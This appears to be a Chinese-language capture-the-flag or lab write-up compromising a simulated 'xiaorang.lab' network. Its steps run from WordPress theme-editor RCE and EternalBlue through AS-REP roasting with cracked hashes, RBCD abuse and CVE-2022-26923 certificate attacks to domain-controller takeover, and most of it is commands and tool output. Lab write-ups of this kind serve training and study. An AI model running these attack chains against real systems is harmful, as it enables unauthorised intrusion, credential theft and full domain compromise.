flag01 上来一个 wordpress。
/wp-admin路由是后台管理,admin:123456登录。
修改当前主题 404 模板 RCE.
1 http://39.99 .150.53 /wp-admin /theme-editor .php?file=404 .php&theme=twentytwentyone
这个改了之后在渲染之后的页面没法进行传参连接,必须用模板 php 访问。
1 2 3 4 http://39.99 .150.53 /index.php/123 / http://39.99 .150.53 /wp-content /themes/twentytwentyone/404 .php
这个要是没文档得 wpscan 扫一下。
蚂蚁的剑连上之后直接 vshell 上线。
flag02 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 [2025 -03 -05 19 :52 :10 ] [INFO ] 暴力破解线程数: 1 [2025 -03 -05 19 :52 :10 ] [INFO ] 开始信息扫描 [2025 -03 -05 19 :52 :10 ] [INFO ] CIDR范围: 172.22 .15.0 -172 .22.15 .255 [2025 -03 -05 19 :52 :10 ] [INFO ] 生成IP范围: 172.22 .15.0 .%!d(string=172.22 .15.255 ) - %!s(MISSING).%!d(MISSING) [2025 -03 -05 19 :52 :10 ] [INFO ] 解析CIDR 172.22 .15.26 /24 -> IP范围 172.22 .15.0 -172 .22.15 .255 [2025 -03 -05 19 :52 :10 ] [INFO ] 最终有效主机数量: 256 [2025 -03 -05 19 :52 :10 ] [INFO ] 开始主机扫描 [2025 -03 -05 19 :52 :10 ] [INFO ] 正在尝试无监听ICMP探测... [2025 -03 -05 19 :52 :10 ] [INFO ] 当前用户权限不足,无法发送ICMP包 [2025 -03 -05 19 :52 :10 ] [INFO ] 切换为PING方式探测... [2025 -03 -05 19 :52 :10 ] [SUCCESS ] 目标 172.22 .15.24 存活 (ICMP) [2025 -03 -05 19 :52 :10 ] [SUCCESS ] 目标 172.22 .15.26 存活 (ICMP) [2025 -03 -05 19 :52 :10 ] [SUCCESS ] 目标 172.22 .15.35 存活 (ICMP) [2025 -03 -05 19 :52 :10 ] [SUCCESS ] 目标 172.22 .15.13 存活 (ICMP) [2025 -03 -05 19 :52 :10 ] [SUCCESS ] 目标 172.22 .15.18 存活 (ICMP) [2025 -03 -05 19 :52 :16 ] [INFO ] 存活主机数量: 5 [2025 -03 -05 19 :52 :16 ] [INFO ] 有效端口数量: 233 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.24 :80 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.26 :80 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.13 :88 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.26 :22 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.24 :135 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.13 :135 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.35 :135 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.24 :139 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.18 :139 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.13 :139 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.18 :135 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.35 :139 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.13 :389 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.18 :80 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.35 :445 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.24 :445 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.13 :445 [2025 -03 -05 19 :52 :16 ] [SUCCESS ] 端口开放 172.22 .15.18 :445 [2025 -03 -05 19 :52 :17 ] [SUCCESS ] 服务识别 172.22 .15.26 :22 => [ssh ] 版本:8.2 p1 Ubuntu 4 ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH -2.0 -OpenSSH_8.2p1 Ubuntu -4 ubuntu0.5. ] [2025 -03 -05 19 :52 :21 ] [SUCCESS ] 服务识别 172.22 .15.26 :80 => [http ] [2025 -03 -05 19 :52 :21 ] [SUCCESS ] 服务识别 172.22 .15.13 :88 => [2025 -03 -05 19 :52 :22 ] [SUCCESS ] 服务识别 172.22 .15.24 :80 => [http ] [2025 -03 -05 19 :52 :22 ] [SUCCESS ] 服务识别 172.22 .15.24 :139 => Banner:[. ] [2025 -03 -05 19 :52 :22 ] [SUCCESS ] 服务识别 172.22 .15.18 :139 => Banner:[. ] [2025 -03 -05 19 :52 :22 ] [SUCCESS ] 服务识别 172.22 .15.13 :139 => Banner:[. ] [2025 -03 -05 19 :52 :22 ] [SUCCESS ] 服务识别 172.22 .15.35 :139 => Banner:[. ] [2025 -03 -05 19 :52 :22 ] [SUCCESS ] 服务识别 172.22 .15.13 :389 => [ldap ] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name [2025 -03 -05 19 :52 :22 ] [SUCCESS ] 服务识别 172.22 .15.35 :445 => [2025 -03 -05 19 :52 :22 ] [SUCCESS ] 服务识别 172.22 .15.24 :445 => [2025 -03 -05 19 :52 :22 ] [SUCCESS ] 服务识别 172.22 .15.13 :445 => [2025 -03 -05 19 :52 :22 ] [SUCCESS ] 服务识别 172.22 .15.18 :445 => [2025 -03 -05 19 :52 :22 ] [SUCCESS ] 端口开放 172.22 .15.24 :3306 [2025 -03 -05 19 :52 :22 ] [SUCCESS ] 服务识别 172.22 .15.18 :80 => [http ] [2025 -03 -05 19 :52 :27 ] [SUCCESS ] 服务识别 172.22 .15.24 :3306 => [mysql ] 版本:5.7 .26 产品:MySQL Banner:[J.5.7.26. % q %Wmg. ' 9paIAr n?.mysql_native_password] [2025-03-05 19:53:22] [SUCCESS] 服务识别 172.22.15.24:135 => [2025-03-05 19:53:22] [SUCCESS] 服务识别 172.22.15.13:135 => [2025-03-05 19:53:22] [SUCCESS] 服务识别 172.22.15.35:135 => [2025-03-05 19:53:22] [SUCCESS] 服务识别 172.22.15.18:135 => [2025-03-05 19:53:22] [INFO] 存活端口数量: 19 [2025-03-05 19:53:22] [INFO] 开始漏洞扫描 [2025-03-05 19:53:22] [INFO] 加载的插件: findnet, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle [2025-03-05 19:53:22] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.15.18 主机名: XR-CA 发现的网络接口: IPv4地址: └─ 172.22.15.18 [2025-03-05 19:53:22] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.15.24 主机名: XR-WIN08 发现的网络接口: IPv4地址: └─ 172.22.15.24 [2025-03-05 19:53:22] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.15.13 主机名: XR-DC01 发现的网络接口: IPv4地址: └─ 172.22.15.13 [2025-03-05 19:53:22] [SUCCESS] 网站标题 http://172.22.15.18 状态码:200 长度:703 标题:IIS Windows Server [2025-03-05 19:53:22] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.15.35 主机名: XR-0687 发现的网络接口: IPv4地址: └─ 172.22.15.35 [2025-03-05 19:53:22] [SUCCESS] 发现漏洞 172.22.15.24 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010 [2025-03-05 19:53:22] [INFO] 系统信息 172.22.15.13 [Windows Server 2016 Standard 14393] [2025-03-05 19:53:22] [SUCCESS] 网站标题 http://172.22.15.24 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.15.24/www [2025-03-05 19:53:22] [SUCCESS] NetBios 172.22.15.13 DC:XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393 [2025-03-05 19:53:22] [SUCCESS] NetBios 172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393 [2025-03-05 19:53:22] [SUCCESS] NetBios 172.22.15.35 XIAORANG\XR-0687 [2025-03-05 19:53:22] [SUCCESS] NetBios 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1 [2025-03-05 19:53:22] [SUCCESS] 网站标题 http://172.22.15.26 状态码:200 长度:39962 标题:XIAORANG.LAB [2025-03-05 19:53:22] [SUCCESS] 目标: http://172.22.15.18:80 漏洞类型: poc-yaml-active-directory-certsrv-detect 漏洞名称: 详细信息: author:AgeloVito links:https://www.cnblogs.com/EasonJim/p/6859345.html [2025-03-05 19:53:23] [SUCCESS] 网站标题 http://172.22.15.24/www/sys/index.php 状态码:200 长度:135 标题:无标题 [2025-03-05 19:53:46] [SUCCESS] 扫描已完成: 35/35
有个 ms17-010(不能用 verge 用了就打不了,不懂为什么之前别的工具打不了了)
1 2 3 4 5 proxychains4 msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp_uuidset RHOST 172.22 .15.24 exploit
1 2 3 4 5 6 setg proxies socks5:139.159 .148.68 :15009 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcpset RHOST 172.22 .15.24 exploit
msf 没 ip, 直接用 win 的工具打下。
写入用户admin01:Config123!@#
然后直接 rdp 连接就行。
flag03 但是小皮打开咋是这个 byd。
看看数据库密码。
其中的 zdoo 这个有一堆账户。
有用户名和邮箱。可以看看有没有 AS-REP Roasting 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 lixiuying@xiaorang.lab lixiaoliang@xiaorang.lab zhangyi@xiaorang.lab jiaxiaoliang@xiaorang.lab zhangli@xiaorang.lab zhangwei@xiaorang.lab liuqiang@xiaorang.lab wangfang@xiaorang.lab wangwei@xiaorang.lab wanglihong@xiaorang.lab huachunmei@xiaorang.lab wanghao@xiaorang.lab zhangxinyu@xiaorang.lab huzhigang@xiaorang.lab lihongxia@xiaorang.lab wangyulan@xiaorang.lab chenjianhua@xiaorang.lab
用 GetNPUsers
1 GetNPUsers -dc-ip 172.22 .15.13 xiaorang.lab/ -usersfile users.txt
得到:
1 2 $krb5asrep $23 $lixiuying @xiaorang.lab@XIAORANG.LAB:f44426d24f4f12874bf772c0ae37395b$99ae9dff9dc5092a13741f2ba62abc84054efd3527ca0918bc1a1715f3f25474517eaf466e800e9611d623985a200110768a9595a38999dec4be414e1cda09e2fa02c420efbcbdada7d7a233ff46a65b8e41ee11c22d9e0d4fd55ec53a5e0be523be84066f1e372a24a83b9a18320651d804d4fbb80a576241a03aa32d98de5986ce40c6c15f8c7f123abfb431d7d522edece528b9425b2d80da4e53876cb4a90edd542be02f831e0d4d0ff09cae4ad48654c3ecde01f1eeb15e4a888c4292306e60e26abfeed621e92107db17fd33fd6cbe465826303e727e8b10cc49e84f3ab905deac6cd485ba4da88b $krb5asrep $23 $huachunmei @xiaorang.lab@XIAORANG.LAB:925 cdf3c6cda1190e10a81838ec3a32a$1cd33ef90c20f54bd039d7d6a6197d0fa370f7edd4b3131ee22364c9ac277a3015b078a48e8ca449ff2530dfdbe2253cb6ad24563ddd0560614fe9e5971e080a081469464d85607b08b4d8c7fc7c89f2e2f929f18c98fd3df79502750cab6cc390983ffcfa1a69b5bb75cceb7bb7b3406180fc824661f2c5dd5c03aeb438215e40d235b15e0a6f4a374e1fde158bf28a08410b8f799b65fcb60aea1a7f5f58450f6438a8d9817f39c84957185ee452eb8b87f6e80f13fce62bfd751b5a639dfaa6de4d6de600d6ae3199a1eab0080d2e0b95bf1dfff202927cff70f20187910798b7fd271b793e126c6ecf41
hashcat 跑下:
1 hashcat hash.txt /usr/share/wordlists/rockyou.txt
1 2 lixiuying:winniethepooh huachunmei:1 qaz2wsx
rdp 用这个登录 172.22.15.35
1 lixiuying@xiaorang.lab:winniethepooh
bloodhound 分析:
1 proxychains4 bloodhound-python -c all -u lixiuying -p winniethepooh -d xiaorang.lab -ns 172.22 .15.13 --zip --dns-tcp
LIXIUYING@XIAORANG.LAB 对 XR-0687.XIAORANG.LAB有 GenericWrite 的权限。打 RBCD
添加机器用户:
1 addcomputer.py -method SAMR xiaorang.lab/lixiuying:winniethepooh -computer-name test$ -computer-pass '123qwe!@#' -dc-ip 172.22 .15.13
上传一个 PowerView.ps1 获取机器 sid。
tools/PowerView.ps1 at master · shigophilo/tools
1 2 Import-Module .\PowerView.ps1Get-NetComputer test -Properties objectsid
S-1-5-21-3745972894-1678056601-2622918667-1147
修改服务资源 msDS-AllowedToActOnBehalfOfOtherIdentity 属性
1 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3745972894-1678056601-2622918667-1147)" ;$SDBytes = New-Object byte[] ($SD .BinaryLength);$SD .GetBinaryForm($SDBytes , 0 );Get-DomainComputer XR-0687 | Set-DomainObject -Set @ {'msds-allowedtoactonbehalfofotheridentity' =$SDBytes } -Verbose
创建票据 `$是转义的$
1 getST.py xiaorang.lab/test`$:123 qwe!@
导入票据
1 2 3 4 set KRB5CCNAME=administrator@cifs_XR-0687 .xiaorang.lab@XIAORANG.LAB.ccache$env:KRB5CCNAME ='administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache'
奇怪的点是 pwsh 导入前面的环境变量会出问题,但是用 cmd 再转 powershell 就行了。
会报错找不到地址信息,先加个 hosts
刷新下再ipconfig /flushdns
1 psexec.py Administrator@XR-0687 .xiaorang.lab -k -no-pass -dc-ip 172.22 .15.13
flag04 最后这个是打得 CVE-2022-26923 是 KDC_ERR_PADATA_TYPE_NOSUPP 出错的打法。
GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
1 certipy account create -user 'TEST2$' -pass '123qwe!@#' -dns XR-DC01 .xiaorang.lab -dc-ip 172.22 .15.13 -u lixiuying -p 'winniethepooh'
1 certipy req -u 'TEST2$@xiaorang.lab' -p '123qwe!@#' -ca 'xiaorang-XR-CA-CA' -target 172.22 .15.18 -template 'Machine'
这个第一次没打通,第二次才行。
1 certipy auth -pfx xr-dc01 .pfx -dc-ip 172.22 .15.13
但是有报错,是因为:域控制器没有安装用于智能卡身份验证的证书
Pass The Certificate when PKINIT Padata Type is NOSUPP
将 pfx 文件导出为.key 和.crt:
1 2 3 openssl pkcs12 -in .\xr-dc01 .pfx -nodes -out test.pem openssl rsa -in test.pem -out test.key openssl x509 -in .\test.pem -out test.crt
然后上脚本:
GitHub - AlmondOffSec/PassTheCert: Proof-of-Concept tool to authenticate to an LDAP/S server with a certificate through Schannel
1 python passthecert.py -action whoami -crt .\test.crt -key .\test.key -domain xiaorang.lab -dc-ip 172.22 .15.13
将证书配置到域控的 RBCD
1 python passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22 .15.13 -delegate-to 'XR-DC01$' -delegate-from 'TEST2$'
1 getST.py xiaorang.lab/TEST2`$:123 qwe!@
设置环境变量,设置 hosts
1 $env:KRB5CCNAME ='Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache'
Ref 
